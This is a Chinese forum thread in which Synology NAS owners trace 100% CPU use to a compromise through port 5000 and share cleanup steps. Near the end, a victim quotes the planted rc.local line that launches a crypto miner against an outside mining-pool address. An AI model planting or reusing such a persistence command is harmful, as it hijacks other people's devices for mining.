httpd-log.pdi4个进程占用了cpu 100%的资源。什么情况？

kukuqiu5 · 发表于 2014-2-13 16:04:15

lixiaojun666 发表于 2014-2-13 15:57
哦，，，那就应该是路由器上面所开了的端口被入侵的，而不是某个端口。。看来默认端口都需要自己改一下了 ...

一般有漏洞扫端口都针对某一个端口，改了可能会好点，白群晖也有这问题，只能等方案或升级了

COVO · 发表于 2014-2-13 17:00:33

本帖最后由 COVO 于 2014-2-13 17:08 编辑

才发现我也中了

我是Hyper-V虚拟了两个
4.2 3202 中招这个开了5000端口
另外一个虚拟的 4.2 3211没事这个没开5000端口

laoyangjp · 发表于 2014-2-13 17:12:49

COVO 发表于 2014-2-13 17:00
才发现我也中了

我是Hyper-V虚拟了两个

哈哈，好厉害

lixiaojun666 · 发表于 2014-2-13 17:17:44

COVO 发表于 2014-2-13 17:00
才发现我也中了

我是Hyper-V虚拟了两个

那就是5000端口出的了。。。换新版本吧。。。不然怎么办？不开端口或者换端口？

lixiaojun666 · 发表于 2014-2-13 17:19:12

js3000 发表于 2014-2-13 14:49
本帖最后由 js3000 于 2014-2-13 14:48 编辑

我没装这个补丁哈。。。该机就拿来pt和共享播放电影使用。

js3000 · 发表于 2014-2-14 00:01:46

好像真是5000端口的问题。改成起他的重启又没事了。

lixiaojun666 · 发表于 2014-2-14 09:30:15

js3000 发表于 2014-2-14 00:01
好像真是5000端口的问题。改成起他的重启又没事了。

5.0系统下，找了半天都没看到哪里修改5000端口的地方呢？

oneman6229617 · 发表于 2014-2-14 20:13:31

lixiaojun666 发表于 2014-2-14 09:30
5.0系统下，找了半天都没看到哪里修改5000端口的地方呢？

5.0好像没这个漏洞了，改不改都无所谓

zhrshwww · 发表于 2014-2-18 21:44:44

lixiaojun666 发表于 2014-2-13 14:23
那你怎么处理的？
我换成5.0了，有百度云。。还不错，。同步文件

主要是你的密码太简单，我的原来是123456，
用ssh进入到etc/rc.local 打开可以看到那个可恶的网址:3333 端口，删除掉，重启。

hotar · 发表于 2014-2-18 22:07:18

据说是被攻击了....

oneman6229617 · 发表于 2014-2-18 23:08:29

zhrshwww 发表于 2014-2-18 21:44
主要是你的密码太简单，我的原来是123456，
用ssh进入到etc/rc.local 打开可以看到那个可恶的网址:3333 ...

看你这么一说，我用winscp进入dms把rc.loacl文件下来用记事本一看，里面的内容是/var/run/httpd-log.pid -B -q -o stratum+tcp://46.249.51.176:3339
我几天前被黑，我重新启动后没这几个进程，然后改了5000端口为其他的，使用到现在没出现过那几个程序，不知道还在我机器上留下什么后门没有